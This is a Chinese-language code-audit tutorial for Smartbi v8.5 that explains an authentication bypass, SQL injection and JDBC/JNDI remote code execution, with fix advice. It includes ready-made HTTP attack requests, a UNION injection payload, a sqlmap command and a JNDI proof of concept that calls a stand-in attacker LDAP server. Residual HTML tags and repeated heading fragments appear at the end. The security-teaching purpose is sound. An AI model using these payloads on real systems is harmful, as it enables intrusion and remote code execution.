Smartbi v8.5 代码审计教学文档<\/h1>

文档说明<\/h2>
本文档基于对 Smartbi v8.5 版本的代码审计过程，详细分析了其系统架构、历史漏洞原理、多种高危漏洞的发现方法、利用技巧及修复建议。旨在为安全研究人员、开发人员及渗透测试人员提供一份深入、实用的代码审计学习资料。<\/p>
注意：本文档所有内容仅用于安全研究与教学目的，严禁用于任何非法活动。<\/strong><\/p>

一、系统概述与目录结构<\/h2>
Smartbi 是一款企业级商业智能（BI）平台。其 V8.5 版本的典型安装目录结构如下：<\/p>
E:. ├─Infobright # 用于分析型数据存储的数据库 ├─jdk # Java 开发环境 ├─MySQL # 数据库服务 ├─SmartbiUnionServer # Union Server 模块（与 Presto 引擎相关） ├─smartbixmla # XMLA 接口模块，用于与 Excel 等外部工具的数据透视表通信 └─Tomcat # Web 应用服务器，核心应用部署于此 ├─bin # 启动\/关闭脚本、配置文件、日志（如 exts-smartbi, mlogs-smartbi 等） ├─conf # 服务器配置文件（如 server.xml, web.xml） ├─lib # Tomcat 及应用依赖的 JAR 库文件 ├─logs # 日志文件 ├─temp # 临时文件 ├─webapps # 部署的 Web 应用程序（核心应用在 smartbi 目录下） └─work # JSP 编译缓存 <\/code><\/pre> 核心应用代码路径<\/strong>：Tomcat\/webapps\/smartbi\/WEB-INF\/lib\/<\/code> 下的各种 jar<\/code> 包，例如 smartbi-FreeQuery.jar<\/code>。<\/p> 技术栈<\/strong>：基于 Java Servlet 框架的 J2EE 应用。理解 Servlet 工作原理对后续分析至关重要。<\/p> 二、历史漏洞分析：身份认证绕过<\/h2> 2.1 漏洞背景<\/h3> 该漏洞允许攻击者在未登录的情况下，直接访问系统后台功能。<\/p> 2.2 漏洞原理分析<\/h3> 入口点<\/strong>：通过分析 web.xml<\/code> 配置文件，发现核心路由 \/vision\/RMIServlet<\/code>。该 Servlet 用于处理远程方法调用。<\/p> <\/li> 关键过滤器<\/strong>：CheckIsLoggedFilter<\/code><\/p> 位置<\/strong>：smartbi-FreeQuery.jar<\/code> 中的 smartbi.freequery.filter.CheckIsLoggedFilter<\/code> 类。<\/li> 核心方法<\/strong>：needToCheck(String className, String methodName)<\/code><\/li> 代码逻辑<\/strong>： private<\/span> boolean<\/span> needToCheck<\/span>(<\/span>String className,<\/span> String methodName)<\/span> {<\/span> <\/span><\/span> \/\/ 关键判断：如果类名是 "BIConfigService"，则完全信任，不进行登录校验 <\/span><\/span><\/span><\/span> if<\/span> (!<\/span>StringUtil.<\/span>isNullOrEmpty<\/span>(<\/span>className)<\/span> &&<\/span> !<\/span>className.<\/span>equals<\/span>(<\/span>"BIConfigService"<\/span>))<\/span> {<\/span> <\/span><\/span> \/\/ 另一个关键判断：如果调用的是 UserService 的特定方法，也不进行登录校验 <\/span><\/span><\/span><\/span> if<\/span> (<\/span>className.<\/span>equals<\/span>(<\/span>"UserService"<\/span>)<\/span> &&<\/span> StringUtil.<\/span>isInArray<\/span>(<\/span>methodName,<\/span> <\/span><\/span> new<\/span> String[]{<\/span>"login"<\/span>,<\/span> "loginFor"<\/span>,<\/span> "clickLogin"<\/span>,<\/span> "loginFromDB"<\/span>,<\/span> "logout"<\/span>,<\/span> <\/span><\/span> "isLogged"<\/span>,<\/span> "isLoginAs"<\/span>,<\/span> "checkVersion"<\/span>,<\/span> "hasLicense"<\/span>}))<\/span> {<\/span> <\/span><\/span> return<\/span> false<\/span>;<\/span> \/\/ 不需要校验 <\/span><\/span><\/span><\/span> }<\/span> <\/span><\/span> \/\/ ... 其他逻辑 <\/span><\/span><\/span><\/span> }<\/span> <\/span><\/span> return<\/span> true<\/span>;<\/span> \/\/ 默认需要校验 <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> 漏洞点<\/strong>：UserService<\/code> 类的 loginFromDB<\/code> 方法被配置为无需登录即可调用。该方法设计用于从数据库验证用户，但攻击者可利用它直接以内置账户身份登录。<\/li> <\/ul> <\/li> <\/ol> 2.3 漏洞复现<\/h3> 攻击请求<\/strong>：<\/p> POST<\/span> \/smartbi\/vision\/RMIServlet HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> localhost:18080<\/span> <\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span> <\/span><\/span> <\/span><\/span>className=UserService&methodName=loginFromDB&params=["service","0a"] <\/span><\/span><\/code><\/pre>参数解释<\/strong>：<\/p> className<\/code>: 指定要调用的服务类，此处为 UserService<\/code>。<\/li> methodName<\/code>: 指定要调用的方法，此处为 loginFromDB<\/code>。<\/li> params<\/code>: 传递给方法的参数列表（JSON 数组格式）。"service"<\/code> 是内置用户名，"0a"<\/code> 是其默认或空口令。<\/li> <\/ul> 结果<\/strong>：成功调用后，服务器会建立会话，攻击者即可直接访问 http:\/\/localhost:18080\/smartbi\/vision\/<\/code> 后台界面。<\/p> 三、 SQL 注入漏洞<\/h2> 3.1 FileResource Servlet SQL 注入<\/h3> 漏洞位置<\/strong>：smartbi.freequery.fileresource.FileResourceServlet<\/code>。<\/li> 触发参数<\/strong>：resId<\/code>。<\/li> 漏洞代码<\/strong>： \/\/ 直接从请求中获取 resID，未做任何过滤 <\/span><\/span><\/span><\/span>resID =<\/span> request.<\/span>getParameter<\/span>(<\/span>"resId"<\/span>);<\/span> <\/span><\/span>\/\/ 直接拼接 SQL 语句 <\/span><\/span><\/span><\/span>ResultSet rs =<\/span> stat.<\/span>executeQuery<\/span>(<\/span>"select c_content,c_name,c_alias,c_type from t_fileresource where c_id = '"<\/span> +<\/span> resID +<\/span> "'"<\/span>);<\/span> <\/span><\/span><\/code><\/pre><\/li> 漏洞复现<\/strong>：直接访问：http:\/\/127.0.0.1:18080\/smartbi\/vision\/FileResource?resId=1&opType=DOWNLOAD<\/code><\/li> 使用 SQLMap 自动化检测： python sqlmap.py -u "http:\/\/127.0.0.1:18080\/smartbi\/vision\/FileResource?resId=1&opType=DOWNLOAD"<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> <\/ol> 3.2 RMIServlet SQL 注入（UrlLinkService）<\/h3> 漏洞位置<\/strong>：smartbi.freequery.client.urllink.URLLinkService<\/code> 类的 getFileResource<\/code> 方法。该方法内部调用了 FileResourceDAO.getFileResource(String id)<\/code>。<\/li> 漏洞代码（FileResourceDAO）<\/strong>： public<\/span> FileResourceVO getFileResource<\/span>(<\/span>String id)<\/span> throws<\/span> SQLException {<\/span> <\/span><\/span> \/\/ 依然存在直接拼接 <\/span><\/span><\/span><\/span> String sql =<\/span> "select c_id, c_name, c_alias, c_type, c_content, c_discription from t_fileresource where c_id = '"<\/span> +<\/span> id +<\/span> "'"<\/span>;<\/span> <\/span><\/span> \/\/ ... 执行查询 <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> 漏洞复现<\/strong>：由于需要通过 RMIServlet<\/code> 调用，构造如下 POST 请求：<\/li> <\/ul> POST<\/span> \/smartbi\/vision\/RMIServlet HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> localhost:18080<\/span> <\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span> <\/span><\/span>Content-Length:<\/span> 99<\/span> <\/span><\/span> <\/span><\/span>className=UrlLinkService&methodName=getFileResource&params=["1' union select database(),2,3,4,5,6#"] <\/span><\/span><\/code><\/pre> 此 Payload 会执行联合查询，将当前数据库名作为结果的一部分返回。<\/li> <\/ul> <\/li> <\/ol> 四、后台 RCE 漏洞（JDBC 反序列化）<\/h2> 此漏洞是 Smartbi 历史中的一个高危漏洞，通过构造恶意的 JDBC 连接参数实现远程代码执行。<\/p> 4.1 漏洞入口点<\/h3> 漏洞位置<\/strong>：smartbi.freequery.sync.SyncServlet<\/code>。<\/li> 触发参数<\/strong>：type=sqldictsync<\/code>。<\/li> 漏洞代码<\/strong>： if<\/span> (<\/span>type.<\/span>equals<\/span>(<\/span>"sqldictsync"<\/span>))<\/span> {<\/span> <\/span><\/span> \/\/ 所有数据库连接参数均来自用户输入，未经过滤 <\/span><\/span><\/span><\/span> String dbType =<\/span> request.<\/span>getParameter<\/span>(<\/span>"dbType"<\/span>);<\/span> <\/span><\/span> String dbServer =<\/span> request.<\/span>getParameter<\/span>(<\/span>"dbServer"<\/span>);<\/span> <\/span><\/span> String dbName =<\/span> request.<\/span>getParameter<\/span>(<\/span>"dbName"<\/span>);<\/span> <\/span><\/span> String dbUser =<\/span> request.<\/span>getParameter<\/span>(<\/span>"dbUser"<\/span>);<\/span> <\/span><\/span> String dbPass =<\/span> request.<\/span>getParameter<\/span>(<\/span>"dbPass"<\/span>);<\/span> <\/span><\/span> String querySql =<\/span> request.<\/span>getParameter<\/span>(<\/span>"querySql"<\/span>);<\/span> <\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span> \/\/ 根据参数调用同步方法 <\/span><\/span><\/span><\/span> clientId =<\/span> (<\/span>new<\/span> SyncResources()).<\/span>synchronize<\/span>(<\/span>dbType,<\/span> dbServer,<\/span> dbName,<\/span> dbUser,<\/span> dbPass,<\/span> querySql);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 4.2 漏洞链分析<\/h3> SyncResources.synchronize()<\/code> 方法调用 DbUtil.getConnection()<\/code> 建立数据库连接。<\/li> DbUtil.getConnection()<\/code> 方法会根据 dbType<\/code>（如 DB2_V9<\/code>）调用 translateDriverInfo<\/code> 方法来组装 JDBC Driver 类和连接字符串（URL）。<\/li> 关键漏洞点<\/strong>：对于某些数据库驱动（如 DB2、Oracle等），其 JDBC URL 支持附加属性。攻击者可以在 dbName<\/code> 或 dbServer<\/code> 参数中注入诸如 clientRerouteServerListJNDIName<\/code> 这样的属性。<\/li> 利用原理<\/strong>：当 Smartbi 尝试使用这个被恶意构造的 JDBC URL 连接数据库时，支持 JNDI 查找的数据库驱动（例如某些版本的 DB2 JCC Driver）会去解析 clientRerouteServerListJNDIName<\/code> 属性指定的 JNDI 地址（如 ldap:\/\/attacker-ip:1389\/Exploit<\/code>）。如果攻击者控制了这个 JNDI 服务器，并指向一个恶意的 Java 对象，就会触发 JNDI 注入，导致远程代码执行。<\/li> <\/ol> 4.3 漏洞复现（概念性 POC）<\/h3> 攻击条件<\/strong>：<\/p> 攻击者需要搭建一个恶意的 JNDI\/LDAP 服务器（例如使用 marshalsec）。<\/li> Smartbi 服务器能够访问到攻击者的 JNDI 服务器。<\/li> <\/ul> 构造恶意请求<\/strong>：<\/p> POST<\/span> \/smartbi\/vision\/SyncServlet?type=sqldictsync HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> target-server:port<\/span> <\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span> <\/span><\/span> <\/span><\/span>dbType=DB2_V9&dbServer=your-malicious-server.com:50000&dbName=testdb:autoRedirect=true;clientRerouteServerListJNDIName=ldap:\/\/your-ldap-server:1389\/Exploit; <\/span><\/span><\/code><\/pre>(注：这是一个概念性 POC，具体可利用的驱动版本、属性名和 Payload 构造需要根据实际环境进行研究和测试。文档中提到的 dbName=a:a=a;clientRerouteServerListJNDIName=ldap:\/\/...<\/code> 是此类攻击的典型思路。)<\/em><\/p> 五、其他历史漏洞简述<\/h2> 审计过程中还发现或提及了其他潜在风险点，虽在 V8.5 中可能已修复或条件苛刻，但仍具学习价值：<\/p> Tomcat AJP 文件包含\/代码执行 (CVE-2020-1938)<\/strong>：如果 Smartbi 使用的 Tomcat 版本存在此漏洞，且开启了 AJP 连接器（默认端口 8009），攻击者可能通过 AJP 协议读取 Web 应用文件或执行代码。<\/li> <\/ul> <\/li> 文件上传漏洞<\/strong>：寻找未对上传文件类型、路径、内容进行严格校验的功能点。<\/li> <\/ul> <\/li> JNDI 注入<\/strong>：在代码中全局搜索 InitialContext.lookup()<\/code>, JndiLookup<\/code> 等关键词，查找用户输入是否直接可控。<\/li> <\/ul> <\/li> <\/ol> 六、代码审计方法论总结<\/h2> 信息收集<\/strong>：分析目录结构、配置文件（web.xml<\/code>）、依赖库，了解应用架构和入口点。<\/li> 入口点定位<\/strong>：重点关注 Servlet、Filter、Controller 等路由处理组件。<\/li> 数据流跟踪<\/strong>：从用户输入（如 request.getParameter()<\/code>）开始，跟踪数据传递过程，直至进入危险函数（如 SQL 拼接、命令执行、反序列化、文件操作、JNDI 查找等）。<\/li> 权限校验审查<\/strong>：检查全局过滤器（Filter）或拦截器（Interceptor）的校验逻辑是否存在绕过可能。<\/li> 第三方库风险<\/strong>：关注已知漏洞的组件版本（如 Fastjson、Jackson、XStream、特定数据库驱动等）。<\/li> <\/ol> 七、修复建议<\/h2> 认证绕过<\/strong>：严格审查过滤器的豁免名单，避免将敏感方法（如登录）排除在校验之外。<\/li> SQL 注入<\/strong>：全线使用预编译（PreparedStatement）进行数据库操作，杜绝字符串拼接。<\/li> JDBC 反序列化\/RCE<\/strong>：对用户输入的数据库连接参数进行严格的白名单校验。<\/li> 及时升级有漏洞的数据库驱动至安全版本。<\/li> 在网络层面限制应用服务器出站连接，减少被利用的风险。<\/li> <\/ul> <\/li> 整体安全<\/strong>：实施最小权限原则、定期进行安全评估和代码审计、保持所有组件的最新版本。<\/li> <\/ol> 免责重申<\/strong>：本文档内容仅供教育目的，帮助理解代码安全风险。任何人不得将其用于任何非法或恶意攻击活动。<\/p>

Smartbi v8.5 代码审计教学文档<\/h1>

2.1 漏洞背景<\/h3> 该漏洞允许攻击者在未登录的情况下，直接访问系统后台功能。<\/p>

四、 后台 RCE 漏洞（JDBC 反序列化）<\/h2> 此漏洞是 Smartbi 历史中的一个高危漏洞，通过构造恶意的 JDBC 连接参数实现远程代码执行。<\/p>

2.1 漏洞背景<\/h3>
该漏洞允许攻击者在未登录的情况下，直接访问系统后台功能。<\/p>

四、后台 RCE 漏洞（JDBC 反序列化）<\/h2>
此漏洞是 Smartbi 历史中的一个高危漏洞，通过构造恶意的 JDBC 连接参数实现远程代码执行。<\/p>